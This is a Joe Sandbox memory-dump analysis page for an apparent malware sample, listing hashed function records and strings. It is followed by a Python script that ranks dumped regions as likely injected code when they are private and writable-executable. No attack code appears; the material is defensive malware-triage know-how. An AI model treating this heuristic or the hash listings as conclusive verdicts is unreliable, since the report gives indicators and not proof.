                                            • API String ID: 48624451-3050659472
                                            • Opcode ID: f4153fd7d1338616bd9855a4c1fb7614a1d7c1f9771dfae089650beee390ae53
                                            • Instruction ID: 6df8f147745b4cfe84ae1fc745ed9cda0039a2c902781ecf1404b53f6827c0ed
                                            • Opcode Fuzzy Hash: f4153fd7d1338616bd9855a4c1fb7614a1d7c1f9771dfae089650beee390ae53
                                            • Instruction Fuzzy Hash: C9318276A003199FDB10DF29DC50BEEB7F8EB48650F904596EC49E7240EB30AA458FA1
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Wow64 Emulation Layer
                                            • API String ID: 3446177414-921169906
                                            • Opcode ID: d1bf7a7b01bcbeade5416c85d9fd303e7746cbaa3fbae3b8f83fa5f64668a025
                                            • Instruction ID: eed31da3e1129538cd8ea4a1ea6d82007eb4c6cca2411792f7c867433f2072ab
                                            • Opcode Fuzzy Hash: d1bf7a7b01bcbeade5416c85d9fd303e7746cbaa3fbae3b8f83fa5f64668a025
                                            • Instruction Fuzzy Hash: 61214A7690021DBFAF019AA58C84DBF7F7DEF89298B004464FA01A6204DA34DE16EB70
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ad384593b213f5ec7aee3e82e9aff0fd10ad3f0632bf029e40ca70fa82dae60a
                                            • Instruction ID: 7deca8e1ba76c530d02419e93b77467171f8937c7b7394caea7eb6444d45da7a
                                            • Opcode Fuzzy Hash: ad384593b213f5ec7aee3e82e9aff0fd10ad3f0632bf029e40ca70fa82dae60a
                                            • Instruction Fuzzy Hash: 17E10EB4D00708DFEB21CFAAC980A9DBBF5BF48314F20456AE965B7621DB31A841CF50
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: 77c85101a1bd777766e4543ec6d02569677021cfc4d924330a79f86e90dabf5a
                                            • Instruction ID: fe217746c043620d5334b1345852f0c1246ac92345ca334be5c806c2a4969c49
                                            • Opcode Fuzzy Hash: 77c85101a1bd777766e4543ec6d02569677021cfc4d924330a79f86e90dabf5a
                                            • Instruction Fuzzy Hash: FC7127B1E003199FEF05CFA9D980ADDBBB5BF48354F14402AE905FB254D734A906CBA2
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: 1a53104f3d058b25459f1016d9f4dd6022ed7660f75cc65e888f9322156f488e
                                            • Instruction ID: 226402d0de89177dbd4e63efbe1b71b5dd188c705c90487ddb88b8832db0bab8
                                            • Opcode Fuzzy Hash: 1a53104f3d058b25459f1016d9f4dd6022ed7660f75cc65e888f9322156f488e
                                            • Instruction Fuzzy Hash: 56516D75B54B229FEB08CE19C8A4A1AB7F1BB49354B20406DDE06DB710DBB5EC51CB80
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: 1188d3fe1e8a743bf1ce630a257742246acb09b43679c6f91b9a38ed53831380
                                            • Instruction ID: 09d2de6f6603475a73fd9fedeefca77302304431418d03a43c53be3bedeb4a35
                                            • Opcode Fuzzy Hash: 1188d3fe1e8a743bf1ce630a257742246acb09b43679c6f91b9a38ed53831380
                                            • Instruction Fuzzy Hash: E85135B5E00219EFEF04CF99C845ADDBBB5BF48394F24812AE905BB254D7349942CF51
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes$BaseInitThreadThunk
                                            • String ID:
                                            • API String ID: 4281723722-0
                                            • Opcode ID: 5bebcdb924dfb9c113c85adac5756f96fefef7c700afa31a0df705b8d3a86e92
                                            • Instruction ID: fa1bb17e1437e8b81905a623201cd8bacc18997f4a1a279ab240896cd3fee6a6
                                            • Opcode Fuzzy Hash: 5bebcdb924dfb9c113c85adac5756f96fefef7c700afa31a0df705b8d3a86e92
                                            • Instruction Fuzzy Hash: 08310275E042289FCF55DFA8D844A9DBBF1AB48720F20416AE512B7390DA359D02CF65
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: 661e4b573d2b4f334b58f31ef87c0723119d8a0cc2e2e763bf5a8ef8e24226d1
                                            • Instruction ID: 39ccdac9979d89f408cc6f32a5bbd1322b9bc5b173113778a47e38baad38f37f
                                            • Opcode Fuzzy Hash: 661e4b573d2b4f334b58f31ef87c0723119d8a0cc2e2e763bf5a8ef8e24226d1
                                            • Instruction Fuzzy Hash: ED324770D04369DFEB21CF64C984BEDBBB4BB08314F1141EAD649A7252DB74AA84CF91
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-
                                            • API String ID: 1302938615-2137968064
                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction ID: caf787970bd552e13920670eecb11ff58914a0d5962a8307344a4bcccf8ac74f
                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction Fuzzy Hash: 9E91A374E0021A9FEB14CE6ACC896FEB7E9AF44769F70451AE854EB2D0EF308940D751
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0$Flst
                                            • API String ID: 0-758220159
                                            • Opcode ID: 65b611d196bd944cfa906caf0d57ba4456239f14efe2a8a6b6e1bebc50d3871c
                                            • Instruction ID: 6174d04d6fbb3a97584d84c2357fe596d6580d6856933956e3fbcab58e87a65f
                                            • Opcode Fuzzy Hash: 65b611d196bd944cfa906caf0d57ba4456239f14efe2a8a6b6e1bebc50d3871c
                                            • Instruction Fuzzy Hash: 8851BEB5E10358CFEB11CF99C884699FBF8EF44B98F35802AD009DB251EB70A945CB90
                                            APIs
                                            Strings
                                            • kLsE, xrefs: 36950540
                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 3695063D
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                            • API String ID: 3446177414-2547482624
                                            • Opcode ID: 395c4c4d109a50d7f7567d2a98c73f535c14e9bcabfab7578f434bb8f6e1c289
                                            • Instruction ID: 8474dec89eccc6bef57098e3a978da4e90ce4060d1b66d8c44f023101973b6b7
                                            • Opcode Fuzzy Hash: 395c4c4d109a50d7f7567d2a98c73f535c14e9bcabfab7578f434bb8f6e1c289
                                            • Instruction Fuzzy Hash: E951D0B59157468FD324DF25C940697B7E8AF84304F22493EEADAC7241E730D586CF92
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: 0$0
                                            • API String ID: 3446177414-203156872
                                            • Opcode ID: 233d6665e6c25f597543345098c389a73ff8a856996c4734bcea95a29e2c0df3
                                            • Instruction ID: cb8d8c5b2929b148ec4c30d4932c9db08b1440a5058d57d1dd2f5ab9f7b3f239
                                            • Opcode Fuzzy Hash: 233d6665e6c25f597543345098c389a73ff8a856996c4734bcea95a29e2c0df3
                                            • Instruction Fuzzy Hash: 16419DB5A187059FD311CF29C984A5ABBE8BF8C318F14496EF488DB301D771E909CB96
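Every function record above is sourced from the same `.sdmp` memory dump of process 9, and its name carries the region's attributes: base 0x36920000 and the values 00000040 / 00001000 / 00020000, which read as PAGE_EXECUTE_READWRITE, MEM_COMMIT and MEM_PRIVATE. Committed, private, writable-and-executable memory that parses "based on PE: true" and carries ntdll's own source markers (`minkernel\ntdll\ldrinit.c`, `LdrpCheckModule`) is exactly the region an analyst pulls first when a loader stages code outside any image mapping. The script below is an added example, not Joe Sandbox code or part of this report: it parses the dump names listed on this page and ranks regions by that RWX-private shape. The field layout (process index, analysis phase, dump sequence, base address, then the Protect/State/Type values of a MEMORY_BASIC_INFORMATION query) is inferred from the names above and the `hcaresult_9_2_36920000` snapshot name, and is an assumption rather than documented Joe Sandbox format; the image-backed name used as a benign contrast is constructed.

```python
"""Triage Joe Sandbox .sdmp dump names by memory-region attributes.

Field layout assumed (inferred from the names on this report page):
  <proc>.<phase>.<seq>.<base>.<protect>.<state>.<type>.<tail>.sdmp
where protect/state/type match winnt.h MEMORY_BASIC_INFORMATION values.
"""
import re
from dataclasses import dataclass

# Standard winnt.h constants.
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_GUARD = 0x100
MEM_COMMIT = 0x1000
MEM_PRIVATE = 0x20000
MEM_MAPPED = 0x40000
MEM_IMAGE = 0x1000000
MEM_TYPES = {MEM_PRIVATE: "PRIVATE", MEM_MAPPED: "MAPPED", MEM_IMAGE: "IMAGE"}

SDMP_NAME = re.compile(
    r"^(?P<proc>[0-9a-fA-F]{8})\.(?P<phase>[0-9a-fA-F]{8})\.(?P<seq>[0-9]+)\."
    r"(?P<base>[0-9a-fA-F]{16})\.(?P<protect>[0-9a-fA-F]{8})\."
    r"(?P<state>[0-9a-fA-F]{8})\.(?P<kind>[0-9a-fA-F]{8})\.(?P<tail>[0-9a-fA-F]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    process_index: int
    phase: int
    sequence: int
    base: int
    protect: int
    state: int
    kind: int


def parse_sdmp_name(name: str) -> DumpRegion:
    """Split a dump file name into its numeric fields (hex except the sequence)."""
    m = SDMP_NAME.match(name.strip())
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name!r}")
    return DumpRegion(
        process_index=int(m["proc"], 16), phase=int(m["phase"], 16),
        sequence=int(m["seq"]), base=int(m["base"], 16),
        protect=int(m["protect"], 16), state=int(m["state"], 16),
        kind=int(m["kind"], 16),
    )


def describe_protect(protect: int) -> str:
    """Name the base protection and note PAGE_GUARD if it is set."""
    name = PAGE_PROTECTIONS.get(protect & 0xFF, f"0x{protect & 0xFF:x}")
    return name + ("|PAGE_GUARD" if protect & PAGE_GUARD else "")


def is_writable_executable(protect: int) -> bool:
    return (protect & 0xFF) in (0x40, 0x80)


def is_suspicious(region: DumpRegion) -> bool:
    """Committed, private (not image- or file-backed) and W+X: the shape of
    injected or self-unpacked code rather than a normally loaded module."""
    return (region.state == MEM_COMMIT and region.kind == MEM_PRIVATE
            and is_writable_executable(region.protect))


def triage(names):
    """Return (summary, suspicious) pairs, suspicious regions first."""
    rows = [(r, is_suspicious(r)) for r in map(parse_sdmp_name, names)]
    rows.sort(key=lambda t: (not t[1], t[0].process_index, t[0].base))
    return [
        (f"pid#{r.process_index} phase{r.phase} base=0x{r.base:X} "
         f"{describe_protect(r.protect)} {MEM_TYPES.get(r.kind, hex(r.kind))}", sus)
        for r, sus in rows
    ]


# Names taken verbatim from the Memory Dump Source entries on this page.
PAGE_DUMPS = [
    "00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp",
    "00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp",
    "00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp",
    "00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp",
]
# Constructed contrast case (not from the report): image-backed, RX, no write.
CONSTRUCTED_BENIGN = (
    "00000009.00000002.2644672130.0000000077000000.00000020.00001000.01000000.00000000.sdmp"
)

if __name__ == "__main__":
    for summary, suspicious in triage(PAGE_DUMPS + [CONSTRUCTED_BENIGN]):
        print(("!! " if suspicious else "   ") + summary)
```

Run against the names above, all four report regions rank as suspicious and the constructed image-backed region does not. The check deliberately keys on State and Type rather than on address ranges: a loader that maps a private copy of a system DLL into fresh memory will still be private and committed even if it lands in an address range that looks like a normal module base.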